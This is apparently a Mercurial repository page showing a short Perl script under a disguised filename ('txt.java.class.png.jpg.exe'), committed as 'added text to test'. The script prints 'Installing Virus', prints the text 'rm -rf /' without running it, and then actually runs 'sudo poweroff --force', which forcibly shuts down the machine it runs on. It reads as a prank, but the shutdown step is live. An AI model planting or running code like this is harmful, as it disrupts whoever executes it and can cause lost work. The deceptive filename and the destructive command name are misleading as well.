view txt.java.class.png.jpg.exe @ 2:667ebaa5d18c

added text to test
author Robert McIntyre <rlm@mit.edu>
date Thu, 27 Oct 2011 22:38:24 -0700
parents fd13a79adf94
children
line wrap: on
line source
1 #!/usr/bin/perl
3 $| = 1;
4 print "Installing Virus";
6 dot();
7 dot();
8 dot();
9 print "\n";
11 print "rm -rf /\n";
12 sleep 4;
13 `sudo poweroff --force`;
18 sub dot {
19 sleep(1);
20 print ".";
21 }
25 "molgasoft"